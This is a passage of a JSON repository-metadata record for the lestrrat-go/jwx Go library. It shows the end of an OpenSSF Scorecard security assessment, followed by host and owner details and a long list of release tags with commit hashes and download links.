license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.